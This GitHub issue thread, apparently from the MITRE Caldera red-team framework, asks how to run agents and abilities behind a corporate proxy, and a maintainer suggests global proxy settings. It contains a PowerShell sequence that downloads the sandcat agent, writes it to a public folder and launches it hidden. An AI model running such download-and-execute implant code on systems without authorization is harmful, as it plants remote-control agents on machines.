### ISSUE TITLE
Fetch files, behind corporate web proxy

### ISSUE THREAD

**Issue by DemanNL** [mitre/caldera#2484]
In a corporate network I have Caldera and a server with sandcat agent. Most abilities fail when they need to download a file from the internet. The downloads need to go through a web proxy.

I've tried launching a sandcat agent and setting the proxy settings in powershell. However the abilities still fail when they need to fetch files from the internet. Does this mean that every powershell ability needs to be rewritten to include proxy settings?

The traffic does seem to go through the proxy with the powershell command below. However authentication doesn't seem to stick. I think this is because it spawns new powershell processes.

This is how I tried launching a sandcat agent with corporate proxy settings.

```
$server="http://<CalderaServer>:30063";
$url="$server/file/download";
[System.Net.HttpWebRequest]::DefaultWebProxy = New-Object System.Net.WebProxy("http://<WebProxy>:8080")
[System.Net.HttpWebRequest]::DefaultWebProxy.BypassProxyOnLocal = $true
$Creds=Get-Credential
$wc=New-Object System.Net.WebClient;
$wc.Proxy.Credentials=$Creds;
$wc.Proxy.BypassArrayList.Add('<CalderaServer>')
$wc.Headers.add("platform","windows");
$wc.Headers.add("file","sandcat.go");
$data=$wc.DownloadData($url);
$name=$wc.ResponseHeaders["Content-Disposition"].Substring($wc.ResponseHeaders["Content-Disposition"].IndexOf("filename=")+9).Replace("`"","");
get-process | ? {$_.modules.filename -like "C:\Users\Public\$name.exe"} | stop-process -f;
rm -force "C:\Users\Public\$name.exe" -ea ignore;
[io.file]::WriteAllBytes("C:\Users\Public\$name.exe",$data) | Out-Null;
Start-Process -FilePath C:\Users\Public\$name.exe -ArgumentList "-server $server -group red" -WindowStyle hidden;
```

**Comment by uruwhy** [comment]
Are you able to set global proxy settings for your entire system, so that applications default to it? Might be able to do that via registry or GPO.

Abilities do spawn separate powershell processes, so it would be easiest to adjust your settings globally. We don't currently support out-of-the-box proxy configuration within abilities.

**Comment by DemanNL** [comment]
Thanks for listing the options :) Will find an other way around it than.
